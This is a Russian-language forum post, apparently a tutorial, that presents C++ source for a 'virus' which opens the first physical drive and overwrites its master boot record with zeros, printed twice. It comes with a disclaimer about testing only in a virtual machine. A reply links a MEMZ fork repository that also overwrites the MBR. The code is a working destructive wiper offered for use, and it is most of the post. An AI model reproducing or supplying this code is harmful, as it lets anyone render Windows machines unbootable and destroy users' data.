ВНИМАНИЕ! Автор не несёт ответственности за ваши действия, вирус был создан для того чтобы понять как работают вирус из нутри, и проверять этот вирус нужно только на виртуальной машине! ВНИМАНИЕ! Что нам понадобится ? Visual Studio. Прямые руки. Эта статья Код: #include <iostream> #include <windows.h> #define MBR_SIZE 512 using namespace std; int main() { DWORD write; char mbr[MBR_SIZE]; ZeroMemory(&mbr, (sizeof mbr)); HANDLE MasterBootRecord = CreateFile(L"\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); if (WriteFile(MasterBootRecord, mbr, MBR_SIZE, &write, NULL) == TRUE) { cout << "Succsessfuly!" << endl; Sleep(3000); ExitProcess(0); } else { cout << "Failed!" << endl; Sleep(3000); ExitProcess(0); } CloseHandle(MasterBootRecord); return 0; } C #include <iostream> #include <windows.h> #define MBR_SIZE 512 using namespace std; int main() { DWORD write; char mbr[MBR_SIZE]; ZeroMemory(&mbr, (sizeof mbr)); HANDLE MasterBootRecord = CreateFile(L"\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); if (WriteFile(MasterBootRecord, mbr, MBR_SIZE, &write, NULL) == TRUE) { cout << "Succsessfuly!" << endl; Sleep(3000); ExitProcess(0); } else { cout << "Failed!" << endl; Sleep(3000); ExitProcess(0); } CloseHandle(MasterBootRecord); return 0; }
proha_999, попробуй в этом проекте поглядеть на сырцы, там MBR перезаписывается картинкой с нян-кэтом, но там половина кода на ассембли написана https://github.com/serbinskis/memz-fork